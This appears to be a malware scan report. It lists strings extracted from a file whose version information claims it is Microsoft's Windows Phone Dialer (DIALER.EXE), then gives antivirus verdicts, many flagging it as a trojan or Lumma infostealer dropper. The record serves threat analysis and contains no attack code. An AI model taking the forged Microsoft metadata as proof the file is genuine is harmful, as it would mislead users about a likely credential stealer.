10.0.19041.1 (WinBuild.160101.0800)
InternalName
DIALER.EXE
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
DIALER.EXE
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.19041.1
VarFileInfo
Translation
SOFTWARE\Microsoft\Windows\CurrentVersion\Dialer
Preferred Line
Preferred Address
Local\DialersIveBeenStartedMutex
Number%d
Name%d
Last dialed %d
Main Window Left/Top
Number
Line %d
Address %d
DIALER.EXE
TAPI32.DLL
0123456789()-.
1234567890*#
DIALER.HLP
DialerClass
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Microsoft Windows Phone Dialer
FileVersion
10.0.19041.1 (WinBuild.160101.0800)
InternalName
DIALER.EXE
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
DIALER.EXE
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.19041.1
VarFileInfo
Translation
Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Generic.4!c
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Gen:Variant.Strictor.291211
Cylance Clean
Zillya Clean
Sangfor Trojan.Win32.Agent.Vcbe
K7AntiVirus Trojan ( 005b37251 )
Alibaba Trojan:JS/Lumma.7d9a7b34
K7GW Trojan ( 005b37251 )
Cybereason malicious.1fe3a7
huorong Clean
Baidu Clean
VirIT Clean
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of JS/Agent.RNX
APEX Clean
Avast Win32:Lumma-E [Drp]
Cynet Malicious (score: 99)
Kaspersky Clean
BitDefender Gen:Variant.Strictor.291211
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Gen:Variant.Strictor.291211
Tencent Js.Virus.Agent.Rgil
TACHYON Clean
Sophos Mal/Generic-S
F-Secure Malware.JS/Agent.wqqzt
DrWeb Clean
VIPRE Gen:Variant.Strictor.291211
TrendMicro Clean
McAfeeD ti!656099D4FCB2
Trapmine Clean
FireEye Gen:Variant.Strictor.291211
Emsisoft Gen:Variant.Strictor.291211 (B)
Ikarus Trojan.JS.Agent
GData Gen:Variant.Strictor.291211
Jiangmin Clean
Webroot Clean
Varist Clean
Avira JS/Agent.wqqzt
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Trojan.Win32.Agent.sa
Xcitium Clean
Arcabit Trojan.Strictor.D4718B
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:Win32/Caynamer.A!ml
Google Detected
AhnLab-V3 Dropper/Win.Generic.C5656726
Acronis Clean
McAfee Artemis!EAE8FEA1FE3A
MAX malware (ai score=81)
VBA32 Clean
Malwarebytes Trojan.JavaScript
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Rising Trojan.Agent/JS!8.11351 (CLOUD)
Yandex Clean
SentinelOne Clean
MaxSecure Trojan.Malware.273604416.susgen
Fortinet W32/Agent.DAT!tr
BitDefenderTheta Clean
AVG Win32:Lumma-E [Drp]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_60% (W)
alibabacloud Trojan:Javascript/Strictor.Gen
No IRMA results available.